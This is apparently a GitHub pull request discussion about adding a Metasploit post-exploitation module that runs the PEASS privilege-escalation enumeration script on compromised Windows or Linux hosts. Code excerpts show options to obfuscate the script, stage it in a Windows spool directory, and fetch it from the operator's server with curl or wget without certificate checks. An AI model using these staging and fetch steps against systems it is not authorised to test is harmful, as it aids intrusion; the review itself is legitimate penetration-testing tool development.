Add post/multi/gather/peass #20208
Add post/multi/gather/peass #20208
Conversation
Based upon discussion in peass-ng/PEASS-ng#465 and the Metasploit Slack, this module is now BSD licensed and may be eligible for inclusion.
| ) | ||
| register_options( | ||
| [ | ||
| OptString.new('WINPEASS', [true, 'Which PEASS script to use. Use True for WinPeass and false for LinPEASS', true]), |
There was a problem hiding this comment.
This should be an enumeration rather than a boolean.
modules/post/multi/gather/peass.rb
Outdated
| [ | ||
| OptString.new('WINPEASS', [true, 'Which PEASS script to use. Use True for WinPeass and false for LinPEASS', true]), | ||
| OptString.new('CUSTOM_URL', [false, 'URL to download the PEASS script from (if not using the default one). Accepts http(s) or absolute path. Overrides the WINPEASS variable', '']), | ||
| OptString.new('PASSWORD', [false, 'Password to encrypt and obfuscate the script (randomly generated). The length must be 32B. If no password is set, only base64 will be used.', rand(36**32).to_s(36)]), |
There was a problem hiding this comment.
Does this need to be configurable by the user in the first place?
There was a problem hiding this comment.
I'm open to removing it, just wanted to get the conversation started with a Rubocop-passing variant of the original module.
| else | ||
| # If no Windows, check if base64 exists | ||
| if !session.platform.include?('win') | ||
| base64_path = cmd_exec('command -v base64') |
There was a problem hiding this comment.
You can use openssl enc -d -A -base64 instead.
There was a problem hiding this comment.
Is openssl more commonly installed than base64? If so, I'm open to it.
modules/post/multi/gather/peass.rb
Outdated
| OptString.new('TEMP_DIR', [false, 'Path to upload the obfuscated PEASS script inside the compromised machine. By default "C:\Windows\System32\spool\drivers\color" is used in Windows and "/tmp" in Unix.', '']), | ||
| OptString.new('PARAMETERS', [false, 'Parameters to pass to the script', nil]), | ||
| OptString.new('TIMEOUT', [false, 'Timeout of the execution of the PEASS script (15min by default)', 15 * 60]), | ||
| OptString.new('SRVHOST', [false, 'Set your metasploit instance IP if you want to download the PEASS script from here via http(s) instead of uploading it.', '']), | ||
| OptString.new('SRVPORT', [false, 'Port to download the PEASS script from using http(s) (only used if SRVHOST)', 443]), | ||
| OptString.new('SSL', [false, 'Indicate if you want to communicate with https (only used if SRVHOST)', true]), | ||
| OptString.new('URIPATH', [false, 'URI path to download the script from there (only used if SRVHOST)', '/' + rand(36**4).to_s(36) + '.txt']) |
There was a problem hiding this comment.
I think™ that metasploit has some utilities/function to upload'n'execute scripts/binaries. Summoning @zeroSteiner !
There was a problem hiding this comment.
We do yes and that's probably how I'd write it, where the code is sent directly from Metasploit over the Meterpreter C&C channel rather than fetched out of band via HTTP. However, that'd realistically require us to have the binary within our source tree like we do SharpHound / Bloodhound. The catch there is the license changes would have to also be applied to that code as well for us to distribute. If we're not modifying the binary, I think we'll be compatible with additional licenses.
That approach would have the downside of some one time license research but would likely be both easier for the operator since they'll have fewer options to tinker with and connections to debug and I'd argue more secure in the case of Meterpreter comms.
Co-authored-by: Julien Voisin <[email protected]>
Co-authored-by: Julien Voisin <[email protected]>
Co-authored-by: bcoles <[email protected]>
Co-authored-by: bcoles <[email protected]>
Updated, thank you. |
| @@ -0,0 +1,396 @@ | |||
| # Copyright (c) 2025, PEASS-ng owners | |||
There was a problem hiding this comment.
Could we add this license to the external license file please? @bwatters-r7
| end | ||
|
|
||
| elsif session.platform.include?('win') | ||
| temp_path = "C:\\Windows\\System32\\spool\\drivers\\color\\#{temp_peass_name}" |
There was a problem hiding this comment.
| temp_path = "C:\\Windows\\System32\\spool\\drivers\\color\\#{temp_peass_name}" | |
| temp_path = get_env('WINDIR') + "\\System32\\spool\\drivers\\color\\#{temp_peass_name}" |
There was a problem hiding this comment.
Does this need to be system32?
| OptString.new('SRVHOST', [false, 'Set your metasploit instance IP if you want to download the PEASS script from here via http(s) instead of uploading it.', '']), | ||
| OptString.new('SRVPORT', [false, 'Port to download the PEASS script from using http(s) (only used if SRVHOST)', 443]), | ||
| OptString.new('SSL', [false, 'Indicate if you want to communicate with https (only used if SRVHOST)', true]), | ||
| OptString.new('URIPATH', [false, 'URI path to download the script from there (only used if SRVHOST)', '/' + Rex::Text.rand_text_alphanumeric(4) + '.txt']) |
There was a problem hiding this comment.
Could we add a DeFanged mode OptBool here in order to instruct the user to that they're about to run an external script that might have implications not necessarily included with Metasploit.
https://github.com/search?q=repo%3Arapid7%2Fmetasploit-framework%20DEFANG&type=code
| cmd = "curl -k -s \"#{url_download_peass}\"" | ||
| curl_path = cmd_exec('command -v curl') | ||
| if !curl_path.include?('curl') | ||
| cmd = "wget --no-check-certificate -q -O - \"#{url_download_peass}\"" |
There was a problem hiding this comment.
Would we be able to make this a datastore option where checking certificates is the default? Maybe a generic option that covers security checks for all methods of downloading.
| file.rewind | ||
| @temp_file_path = file.path | ||
|
|
||
| if datastore['SRVHOST'] == '' |
There was a problem hiding this comment.
Is there a circumstance where uploading via https is preferrable to simply uploading through the session?
| end | ||
|
|
||
| elsif session.platform.include?('win') | ||
| temp_path = "C:\\Windows\\System32\\spool\\drivers\\color\\#{temp_peass_name}" |
There was a problem hiding this comment.
Does this need to be system32?
Based upon discussion in peass-ng/PEASS-ng#465 and the Metasploit Slack, this module is now BSD licensed and may be eligible for inclusion.
I am not the author, merely a fan trying to
make two toys kissintegrate PEASS without requiring users to add it themselves.Verification
List the steps needed to make sure this thing works
msfconsoleuse post/multi/gather/peassset WINPEASS false(if running against a Linux target)run